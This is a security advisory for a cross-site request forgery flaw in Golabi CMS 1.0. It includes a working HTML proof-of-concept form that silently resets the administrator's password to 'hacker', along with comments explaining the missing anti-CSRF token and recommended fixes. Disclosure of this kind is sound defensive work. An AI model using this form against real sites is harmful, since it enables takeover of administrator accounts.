< ------------------- header data start ------------------- >

#############################################################

# Application Name : Golabi Cms 1.0

# Vulnerability Type : CSRF (XSRF, cross-site request forgery)

# Impact : The admin password can be changed remotely and automatically.

# Bug Fix Advice : A session-bound token (anti-CSRF session token) should be added to the form, and the current password should be required before a change is accepted.

# author : Bug Researchers/system-hacker

############################################################

< ------------------- header data end of ------------------- >



< -- bug code start -- >

<!-- Proof-of-concept request for the CSRF issue described in the header:
     a cross-site POST to the Module=Admin / submodule=Members / action=SaveUser
     endpoint for user id=1. The form submits only username, Email, password
     and Group. It carries no session-bound anti-CSRF token and no
     current-password field, so the server has nothing with which to tell this
     forged request apart from one the administrator submitted deliberately.
     Mitigation, as the header advises: validate a per-session token in the
     SaveUser handler and require the existing password before accepting a
     change; treating password changes as re-authenticating actions is the
     usual way to do this. -->
<form action=http://localhost/path/index.php?Module=Admin&submodule=Members&action=SaveUser&id=1 method=post name=usrset >
<td width=50% nowrap>username:</td>
<td width=50%><b>Admin<input name=username type=hidden value=Admin></b></td>
<td width=50% nowrap>Email:</td>
<!-- NOTE(review): the Email value below looks like an email-obfuscation
     artifact of the page extraction rather than the advisory's original text;
     left as-is. -->
<td width=50%><input type=text name=Email value=[email protected] size=20 maxlength=50></td>
<td width=50% nowrap>password:</td>
<!-- The application's own hint ("leave clear for no change") confirms the
     handler sets a new password whenever this field is non-empty, without
     asking for the old one. -->
<td width=50%><input type=password name=password value=hacker size=20 maxlength=32><small>leave clear for no change.</small></td>
<td width=50% nowrap>User Group:</td>
<td width=50%><select name=Group><option selected value=10>Administrators</option></select></td>
<td width=100%> </td>
<td nowrap><input type=reset name=reset value=Reset><input type=submit name=save value=Save></td>
</form>

< -- bug code end of -- >